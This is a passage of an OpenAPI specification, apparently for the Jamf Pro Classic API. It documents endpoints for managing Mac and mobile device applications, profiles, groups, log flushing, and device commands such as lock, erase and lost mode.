format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- licensedsoftware
operationId: findLicensedSoftwareById
summary: Finds licensed software by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- licensedsoftware
description: 'Matching computers are derived, thus they cannot be set with POST.'
operationId: createLicensedSoftwareById
summary: Creates a new computer command by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- licensedsoftware
description: 'Matching computers are derived, thus they cannot be set with PUT.'
operationId: updateLicensedSoftwareById
summary: Updates an existing computer command by id
'/licensedsoftware/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- licensedsoftware
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findLicensedSoftwareByName
summary: Finds licensed software by name
/logflush:
delete:
responses:
'200':
description: No response was specified
tags:
- logflush
description: 'log, log_id, interval, and devices specified in an XML file. Sample file: <logflush><log>policy</log><log_id>2</log_id><interval>THREE MONTHS</interval><computers><computer><id>1</id></computer><computer><id>2</id></computer></computers></logflush>'
operationId: logFlush
summary: Flushes a log specified in an XML file.
'/logflush/{log}/id/{id}/interval/{interval}':
delete:
parameters:
- description: 'Id of policy whose log will be flushed, such as id/7.'
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- logflush
description: 'Interval is a combination of Zero, One, Two, Three, Six, and Day, Week, Month, Year. For example, JSSResource/logflush/policies/interval/Three+Months'
operationId: createLogFlushWithIdAndInterval
summary: Flushes a log for a policy for a given interval listed in the URL.
'/logflush/{log}/interval/{interval}':
delete:
parameters:
- description: Interval to be flushed.
in: path
name: interval
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- logflush
description: 'Interval is a combination of Zero, One, Two, Three, Six, and Day, Week, Month, Year. For example, JSSResource/logflush/policies/interval/Three+Months'
operationId: createLogFlushForInterval
summary: Flushes a log for all policies for a given interval listed in the URL.
/macapplications:
get:
responses:
'200':
description: No response was specified
tags:
- macapplications
operationId: findMacapps
summary: Finds all mac applications
'/macapplications/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- macapplications
operationId: deleteMacappById
summary: Deletes a mac application by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- macapplications
operationId: findMacappsById
summary: Finds mac applications by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- macapplications
description: POST cannot be used to set vpp codes.
operationId: createMacappById
summary: Creates a new mac application by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- macapplications
description: PUT cannot be used to set vpp codes.
operationId: updateMacappById
summary: Updates an existing mac application by id
'/macapplications/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- macapplications
description: 'Displays information specified with the {subset} parameter for a mac application specified with the {id} parameter. Lookup by name is also supported. For example, /macapplications/id/3/subset/General&Scope or /macapplications/id/3/subset/General.'
operationId: findMacappsByIdSubset
summary: Display subsets of information for a mac application
'/macapplications/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- macapplications
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMacappsByName
summary: Finds mac applications by name
/managedpreferenceprofiles:
get:
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
operationId: findManagedPreferenceProfiles
summary: Finds all managed preference profiles
'/managedpreferenceprofiles/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
operationId: deleteManagedPreferenceProfilesById
summary: Deletes a managed preference profiles by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
operationId: findManagedPreferenceProfilesById
summary: Finds managed preference profiles by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
operationId: createManagedPreferenceProfileById
summary: Creates a new managed preference profile by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
operationId: updateManagedPreferenceProfilesById
summary: Updates an existing managed preference profiles by id
'/managedpreferenceprofiles/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
description: 'Displays information specified with the {subset} parameter for a profile specified with the {id} parameter. Name is also supported. For example, /managedpreferenceprofiles/id/3/subset/General&Settings.'
operationId: findManagedPreferenceProfilesByIdSubset
summary: Display subsets of information for a managed preference profile
'/managedpreferenceprofiles/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- managedpreferenceprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findManagedPreferenceProfilesByName
summary: Finds managed preference profiles by name
/mobiledeviceapplications:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
operationId: findMobileDeviceApplications
summary: Finds all mobile device applications
'/mobiledeviceapplications/bundleid/{bundleid}':
get:
parameters:
- description: Bundle ID to filter by
in: path
name: bundleid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
description: 'You can also PUT and DELETE using this resource URL. If multiple applications match, no application is returned. You may specify both bundle id and version to uniquely identify a mobile device application.'
operationId: findMobileDeviceApplicationsByBundleID
summary: Finds mobile device applications by bundle ID
'/mobiledeviceapplications/bundleid/{bundleid}/version/{version}':
get:
parameters:
- description: Bundle ID to filter by
in: path
name: bundleid
required: true
type: string
- description: Version to filter by
in: path
name: version
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
description: You can also PUT and DELETE using this resource URL.
operationId: findMobileDeviceApplicationsByBundleIDandVersion
summary: Finds mobile device applications by bundle ID and version
'/mobiledeviceapplications/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
operationId: deleteMobileDeviceApplicationById
summary: Deletes a mobile device application by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
operationId: findMobileDeviceApplicationsById
summary: Finds mobile device applications by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
description: '<keep_description_and_icon_up_to_date> refers to the option to automatically update app information. App configuration preferences should be listed using character entities, e.g. <preferences>&lt;dict&gt;&lt;key&gt;JSS_ID&lt;/key&gt;&lt;string&gt;313&lt;/string&gt;&lt;/dict&gt;</preferences>'
operationId: createMobileDeviceApplicationById
summary: Creates a new mobile device application by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
description: '<keep_description_and_icon_up_to_date> and <automatically_update_app> are redundant. App configuration preferences should be listed using character entities, e.g. <preferences>&lt;dict&gt;&lt;key&gt;abc&lt;/key&gt;&lt;string&gt;xyz&lt;/string&gt;&lt;/dict&gt;</preferences>'
operationId: updateMobileDeviceApplicationById
summary: Updates an existing mobile device application by id
'/mobiledeviceapplications/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
description: 'Displays information specified with the {subset} parameter for a mobile device application specified with the {id} parameter. Lookup by name or bundle id is also supported. For example, /mobiledeviceapplications/id/3/subset/General or /mobiledeviceapplications/name/MyApp/subset/General&SelfService.'
operationId: findMobileDeviceAppsByIdSubset
summary: Display subsets of information for a mobile device application
'/mobiledeviceapplications/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceapplications
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceApplicationsByName
summary: Finds mobile device applications by name
/mobiledevicecommands:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
operationId: findMobileDeviceCommands
summary: Finds all mobile device commands
/mobiledevicecommands/command:
post:
parameters:
- description: Command name
in: body
name: command
required: true
schema:
type: string
- description: Device name to set (required for DeviceName command)
in: body
name: device_name
required: false
schema:
type: string
- description: Lock message for the DeviceLock command
in: body
name: lock_message
required: false
schema:
type: string
- description: 'Where to set wallpaper (required for Wallpaper command). Possible integer values are: 1 (Lock screen), 2 (Home screen), or 3 (Lock and home screens)'
in: body
name: wallpaper_setting
required: false
schema:
type: integer
- description: Device name to set (required for Wallpaper command if wallpaper_content is not set)
in: body
name: wallpaper_id
required: false
schema:
type: string
- description: Wallpaper image in PNG or JPEG format encoded using base64 (required for Wallpaper command if wallpaper_id is not set)
in: body
name: wallpaper_content
required: false
schema:
type: string
- description: The number of seconds the screen must be locked before unlock attempts will require the device passcode.
in: body
name: passcode_lock_grace_period
required: false
schema:
type: integer
- description: 'The message to be displayed on the lost device. ''lost_mode_message'', ''lost_mode_phone'' or both of those parameters must be provided to enable lost mode.'
name: lost_mode_message
required: false
type: string
- description: 'The phone to be displayed on the lost device. ''lost_mode_message'', ''lost_mode_phone'' or both of those parameters must be provided to enable lost mode.'
in: body
name: lost_mode_phone
required: false
schema:
type: string
- description: The footnote to be displayed on the lost device.
in: body
name: lost_mode_footnote
required: false
schema:
type: string
- description: '''false'' if the lost mode is NOT to be re-enabled after the device is wiped and re-enrolled. Defaults to ''true''.'
in: body
name: always_enforce_lost_mode
required: false
schema:
type: string
- description: '''true'' if the device is to play a loud sound while the lost mode is enabled. Defaults to ''false''.'
in: body
name: lost_mode_with_sound
required: false
schema:
type: string
- description: '''true'' if the data plan should be preserved when wiping a device'
in: body
name: preserve_data_plan
required: false
schema:
type: string
- description: 'If true, on the next reboot Proximity Setup is not allowed and the pane in Setup Assistant will be skipped. Defaults to false.'
in: body
name: disallow_proximity_setup
required: false
schema:
type: string
- description: 'Will attempt to clear the activation lock if the device has it enabled. Accepts true, defaults to false. Optional parameter for EraseDevice.'
in: body
name: clear_activation_lock
required: false
schema:
type: string
- description: 'Specify the behavior of the install. Possible integer values are: 1 (Download the update for users to install), 2 (Download and install the update, and restart devices after installation).'
in: body
name: install_action
required: false
schema:
type: integer
- description: Specify the OS version of the update. Updating to a specific iOS version requires devices with iOS 11.3 or later. Updating to a specific tvOS version requires devices with tvOS 12.2 or later. install_action required by the ScheduleOSUpdate command if product_version is specified.
in: body
name: product_version
required: false
schema:
type: string
- description: The carrier's eSIM server URL to query. This URL is obtained from each carrier separately.
in: body
name: e_sim_server_url
required: false
schema:
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
operationId: createMobileDeviceCommand
summary: 'Creates a new mobile device command. Command and mobile device list specified in an XML file. Commands supported: Settings, DeviceLock, EraseDevice, ClearPasscode, UnmanageDevice, UpdateInventory, ClearRestrictionsPassword, SettingsEnableDataRoaming, SettingsDisableDataRoaming, SettingsEnableVoiceRoaming, SettingsDisableVoiceRoaming, SettingsEnableAppAnalytics, SettingsDisableAppAnalytics, SettingsEnableDiagnosticSubmission, SettingsDisableDiagnosticSubmission, SettingsEnableBluetooth, SettingsDisableBluetooth (iOS 11.3+ and supervised only), SettingsEnablePersonalHotspot, SettingsDisablePersonalHotspot, BlankPush, Wallpaper (supervised only), DeviceName (supervised only), ShutDownDevice (supervised only), RestartDevice (supervised only), PasscodeLockGracePeriod (shared iPad only), , EnableLostMode (supervised only), DisableLostMode (supervised and in lost mode only), DeviceLocation (supervised and in lost mode only), PlayLostModeSound (supervised and in lost mode only), ScheduleOSUpdate (iOS 9 - 10.2, enrolled via a Prestage enrollment; and/or iOS 10.3 or later; tvOS 12 or later), RefreshCellularPlans'
'/mobiledevicecommands/command/DeviceLock/{lock_message}/id/{id_list}':
post:
parameters:
- description: 'Mobile device id values, multiple ids may be separated by commas. Examples: /id/13&nbsp;&nbsp;&nbsp;id/13,14,15'
in: path
name: id_list
required: true
type: string
- description: Lock message for the DeviceLock command
in: body
name: lock_message
required: false
schema:
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: 'Example: JSSResource/mobiledevicecommands/command/DeviceLock/Lock+Message/id/13 -X POST '
operationId: createMobileDeviceLockCommandURL
summary: 'Creates a new command to lock a mobile device. Command and mobile device list specified in URL. '
'/mobiledevicecommands/command/DeviceName/{device_name}/id/{id_list}':
post:
parameters:
- description: 'Mobile device id values, multiple ids may be separated by commas. Examples: /id/13&nbsp;&nbsp;&nbsp;id/13,14,15'
in: path
name: id_list
required: true
type: string
- description: Device name to set (required for DeviceName command)
in: body
name: device_name
required: false
schema:
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: 'Example: JSSResource/mobiledevicecommands/command/DeviceName/NewName/id/13 -X POST '
operationId: createMobileDeviceNameCommandURL
summary: Creates a new command to set the name of a mobile device. Command and mobile device list specified in URL. Command fails when another DeviceName command is pending. Use of a list of devices is generally not advised.
'/mobiledevicecommands/command/ScheduleOSUpdate/{install_action}/id/{id_list}':
post:
parameters:
- description: 'Mobile device id values, multiple ids may be separated by commas. Examples: /id/13&nbsp;&nbsp;&nbsp;id/13,14,15'
in: path
name: id_list
required: true
type: string
- description: 'Specify the behavior of the install. Possible integer values are: 1 (Download the update for users to install), 2 (Download and install the update, and restart devices after installation)'
in: body
name: install_action
required: false
schema:
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: 'Example: JSSResource/mobiledevicecommands/command/ScheduleOSUpdate/2/id/13 -X POST'
operationId: createMobileScheduleOSUpdateCommandURL
summary: Creates a new command to request that a mobile device update its OS. Command and mobile device list specified in URL. Device will be updated to the latest OS version based on device eligibility.
'/mobiledevicecommands/command/ScheduleOSUpdate/{install_action}/{product_version}/id/{id_list}':
post:
parameters:
- description: 'Mobile device id values, multiple ids may be separated by commas. Examples: /id/13&nbsp;&nbsp;&nbsp;id/13,14,15'
in: path
name: id_list
required: true
type: string
- description: 'Specify the behavior of the install. Possible integer values are: 1 (Download the update for users to install), 2 (Download and install the update, and restart devices after installation)'
in: body
name: install_action
required: false
schema:
type: integer
- description: Specify the OS version of the update. Updating to a specific iOS version requires devices with iOS 11.3 or later. Updating to a specific tvOS version requires devices with tvOS 12.2 or later. install_action required by the ScheduleOSUpdate command if product_version is specified.
in: body
name: product_version
required: false
schema:
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: 'Example: JSSResource/mobiledevicecommands/command/ScheduleOSUpdate/1/12.3.1/id/13 -X POST'
operationId: createMobileScheduleOSUpdateCommandWithProductVersionURL
summary: 'Creates a new command to request that a mobile device update its OS. Command and mobile device list specified in URL. Mixing iOS and tvOS devices in ID list is not advised, as product version is specific to OS type.'
'/mobiledevicecommands/command/{command}':
get:
parameters:
- description: Name to filter by
in: path
name: command
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: You can POST using this resource URL.
operationId: findMobileDeviceCommandsByCommand
summary: Finds all mobile device commands for specified command
post:
parameters:
- description: Command name (url)
in: path
name: command
required: true
type: string
- description: Device name to set (required for DeviceName command)
in: body
name: device_name
required: false
schema:
type: string
- description: Lock message for the DeviceLock command
in: body
name: lock_message
required: false
schema:
type: string
- description: 'Where to set wallpaper (required for Wallpaper command). Possible integer values are: 1 (Lock screen), 2 (Home screen), or 3 (Lock and home screens)'
in: body
name: wallpaper_setting
required: false
schema:
type: integer
- description: Device name to set (required for Wallpaper command if wallpaper_content is not set)
in: body
name: wallpaper_id
required: false
schema:
type: string
- description: Wallpaper image in PNG or JPEG format encoded using base64 (required for Wallpaper command if wallpaper_id is not set)
in: body
name: wallpaper_content
required: false
schema:
type: string
- description: The number of seconds the screen must be locked before unlock attempts will require the device passcode.
in: body
name: passcode_lock_grace_period
required: false
schema:
type: integer
- description: 'The message to be displayed on the lost device. ''lost_mode_message'', ''lost_mode_phone'' or both of those parameters must be provided to enable lost mode.'
name: lost_mode_message
required: false
type: string
- description: 'The phone to be displayed on the lost device. ''lost_mode_message'', ''lost_mode_phone'' or both of those parameters must be provided to enable lost mode.'
in: body
name: lost_mode_phone
required: false
schema:
type: string
- description: The footnote to be displayed on the lost device.
in: body
name: lost_mode_footnote
required: false
schema:
type: string
- description: '''false'' if the lost mode is NOT to be re-enabled after the device is wiped and re-enrolled. Defaults to ''true''.'
in: body
name: always_enforce_lost_mode
required: false
schema:
type: string
- description: '''true'' if the device is to play a loud sound while the lost mode is enabled. Defaults to ''false''.'
in: body
name: lost_mode_with_sound
required: false
schema:
type: string
- description: '''true'' if the data plan should be preserved when wiping a device'
in: body
name: preserve_data_plan
required: false
schema:
type: string
- description: 'If true, on the next reboot Proximity Setup is not allowed and the pane in Setup Assistant will be skipped. Defaults to false.'
in: body
name: disallow_proximity_setup
required: false
schema:
type: string
- description: 'Will attempt to clear the activation lock if the device has it enabled. Accepts true, defaults to false. Optional parameter for EraseDevice.'
in: body
name: clear_activation_lock
required: false
schema:
type: string
- description: 'Specify the behavior of the install. Possible integer values are: 1 (Download the update for users to install), 2 (Download and install the update, and restart devices after installation).'
in: body
name: install_action
required: false
schema:
type: integer
- description: Specify the OS version of the update. Updating to a specific iOS version requires devices with iOS 11.3 or later. Updating to a specific tvOS version requires devices with tvOS 12.2 or later. install_action required by the ScheduleOSUpdate command if product_version is specified.
in: body
name: product_version
required: false
schema:
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
operationId: createMobileDeviceCommandByCommand
summary: 'Creates a new mobile device command using command name. Command and mobile device list specified in an XML file. Commands supported: Settings, DeviceLock, EraseDevice, ClearPasscode, UnmanageDevice, UpdateInventory, ClearRestrictionsPassword, SettingsEnableDataRoaming, SettingsDisableDataRoaming, SettingsEnableVoiceRoaming, SettingsDisableVoiceRoaming, SettingsEnableAppAnalytics, SettingsDisableAppAnalytics, SettingsEnableDiagnosticSubmission, SettingsDisableDiagnosticSubmission, SettingsEnableBluetooth, SettingsDisableBluetooth (iOS 11.3+ and supervised only), SettingsEnablePersonalHotspot, SettingsDisablePersonalHotspot, BlankPush, Wallpaper (supervised only), DeviceName (supervised only), ShutDownDevice (supervised only), RestartDevice (supervised only), PasscodeLockGracePeriod (shared iPad only), EnableLostMode (supervised only), DisableLostMode (supervised and in lost mode only), DeviceLocation (supervised and in lost mode only), PlayLostModeSound (supervised and in lost mode only), ScheduleOSUpdate (iOS 9 - 10.2, enrolled via a Prestage enrollment; and/or iOS 10.3 or later; tvOS 12 or later)'
'/mobiledevicecommands/command/{command}/id/{id_list}':
post:
parameters:
- description: 'Mobile device id values, multiple ids may be separated by commas. Examples: /id/13&nbsp;&nbsp;&nbsp;id/13,14,15'
in: path
name: id_list
required: true
type: string
- description: The number of seconds the screen must be locked before unlock attempts will require the device passcode.
in: body
name: passcode_lock_grace_period
required: false
schema:
type: integer
- description: 'The message to be displayed on the lost device. ''lost_mode_message'', ''lost_mode_phone'' or both of those parameters must be provided to enable lost mode.'
name: lost_mode_message
required: false
type: string
- description: 'The phone to be displayed on the lost device. ''lost_mode_message'', ''lost_mode_phone'' or both of those parameters must be provided to enable lost mode.'
in: body
name: lost_mode_phone
required: false
schema:
type: string
- description: The footnote to be displayed on the lost device.
in: body
name: lost_mode_footnote
required: false
schema:
type: string
- description: '''false'' if the lost mode is NOT to be re-enabled after the device is wiped and re-enrolled. Defaults to ''true''.'
in: body
name: always_enforce_lost_mode
required: false
schema:
type: string
- description: '''true'' if the device is to play a loud sound while the lost mode is enabled. Defaults to ''false''.'
in: body
name: lost_mode_with_sound
required: false
schema:
type: string
- description: '''true'' if the data plan should be preserved when wiping a device'
in: body
name: preserve_data_plan
required: false
schema:
type: string
- description: 'If true, on the next reboot Proximity Setup is not allowed and the pane in Setup Assistant will be skipped. Defaults to false.'
in: body
name: disallow_proximity_setup
required: false
schema:
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: 'Example: JSSResource/mobiledevicecommands/command/UpdateInventory/id/13 -X POST '
operationId: createMobileDeviceCommandURL
summary: 'Creates a new mobile device command. Command and mobile device list specified in URL. Commands supported: Settings, EraseDevice, ClearPasscode, UnmanageDevice, UpdateInventory, ClearRestrictionsPassword, SettingsEnableDataRoaming, SettingsDisableDataRoaming, SettingsEnableVoiceRoaming, SettingsDisableVoiceRoaming, SettingsEnableAppAnalytics, SettingsDisableAppAnalytics, SettingsEnableDiagnosticSubmission, SettingsDisableDiagnosticSubmission, SettingsEnableBluetooth, SettingsDisableBluetooth (iOS 11.3+ and supervised only), SettingsEnablePersonalHotspot, SettingsDisablePersonalHotspot, BlankPush, ShutDownDevice (supervised only), RestartDevice (supervised only), PasscodeLockGracePeriod (shared iPad only), EnableLostMode (supervised only), DisableLostMode (supervised and in lost mode only), DeviceLocation (supervised and in lost mode only), PlayLostModeSound (supervised and in lost mode only)'
'/mobiledevicecommands/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
description: You can POST using this resource URL.
operationId: findMobileDeviceCommandsByName
summary: Finds all mobile device commands by name. Same as command below.
'/mobiledevicecommands/uuid/{uuid}':
get:
parameters:
- description: UUID value to filter by
format: int64
in: path
name: uuid
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevicecommands
operationId: findMobileDeviceCommandsByUuid
summary: Finds a mobile device command by uuid
/mobiledeviceconfigurationprofiles:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
operationId: findMobileDeviceConfigurationProfiles
summary: Finds all mobile device configuration profiles
'/mobiledeviceconfigurationprofiles/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
operationId: deleteMobileDeviceConfigurationProfileById
summary: Deletes a mobile device configuration profile by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
operationId: findMobileDeviceConfigurationProfilesById
summary: Finds mobile device configuration profiles by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
operationId: createMobileDeviceConfigurationProfileById
summary: Creates a new mobile device configuration profile by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
operationId: updateMobileDeviceConfigurationProfileById
summary: Updates an existing mobile device configuration profile by id
'/mobiledeviceconfigurationprofiles/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
description: 'Displays information specified with the {subset} parameter for a mobile device configuration specified with the {id} parameter. Lookup by name is also supported. For example, /mobiledeviceconfigurationprofiles/id/3/subset/General&Scope or /mobiledeviceconfigurationprofiles/name/MyCP/subset/Scope.'
operationId: findMobileDeviceConfigurationProfilesByIdSubset
summary: Display subsets of information for a mobile device configuration profile
'/mobiledeviceconfigurationprofiles/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceconfigurationprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceConfigurationProfilesByName
summary: Finds mobile device configuration profiles by name
/mobiledeviceenrollmentprofiles:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
operationId: findMobileDeviceEnrollmentProfiles
summary: Finds all mobile device enrollment profiles
'/mobiledeviceenrollmentprofiles/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
operationId: deleteMobileDeviceEnrollmentProfileById
summary: Deletes a mobile device enrollment profile by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
operationId: findMobileDeviceEnrollmentProfilesById
summary: Finds mobile device enrollment profiles by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
operationId: createMobileDeviceEnrollmentProfilesById
summary: Creates a new mobile device enrollment profile by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
operationId: updateMobileDeviceEnrollmentProfileById
summary: Updates an existing mobile device enrollment profile by id
'/mobiledeviceenrollmentprofiles/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
description: 'Displays information specified with the {subset} parameter for an enrollment profile specified with the {id} parameter. Lookup by name and invitation are also supported. For example, /mobiledeviceenrollmentprofiles/id/3/subset/General&Scope or /mobiledeviceenrollmentprofiles/name/myProfile/subset/Scope.'
operationId: findMobileDeviceEnrollmentProfilesByIdSubset
summary: Display subsets of information for an enrollment profile
'/mobiledeviceenrollmentprofiles/invitation/{invitation}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceEnrollmentProfilesByName
summary: Finds mobile device enrollment profiles by invitation
'/mobiledeviceenrollmentprofiles/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceenrollmentprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceEnrollmentProfilesByInvitation
summary: Finds mobile device enrollment profiles by invitation
/mobiledeviceextensionattributes:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledeviceextensionattributes
operationId: findMobiledeviceextensionattributes
summary: Finds all mobile device extension attributes
'/mobiledeviceextensionattributes/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceextensionattributes
operationId: deleteMobiledeviceextensionattributeById
summary: Deletes a mobile device extension attribute by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceextensionattributes
operationId: findMobiledeviceextensionattributesById
summary: Finds mobile device extension attributes by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceextensionattributes
operationId: createMobiledeviceextensionattributeById
summary: Creates a new mobile device extension attribute by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceextensionattributes
operationId: updateMobiledeviceextensionattributeById
summary: Updates an existing mobile device extension attribute by id
'/mobiledeviceextensionattributes/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceextensionattributes
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobiledeviceextensionattributesByName
summary: Finds mobiledeviceextensionattributes by name
/mobiledevicegroups:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledevicegroups
operationId: findMobileDeviceGroups
summary: Finds all mobile device groups
'/mobiledevicegroups/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevicegroups
operationId: deleteMobileDeviceGroupById
summary: Deletes a mobile device group by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevicegroups
operationId: findMobileDeviceGroupsById
summary: Finds mobile device groups by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicegroups
description: 'POST also works with a name, but generally id is used.'
operationId: createMobileDeviceGroupById
summary: Creates a new mobile device group by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevicegroups
description: PUT also works with a name. One or more mobile devices can be added by using <mobile_device_additions> instead of <mobile_devices>. One or more computers can be deleted by using <mobile_device_deletions> instead of <mobile_devices>
operationId: updateMobileDeviceGroupById
summary: Updates an existing mobile device group by id
'/mobiledevicegroups/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicegroups
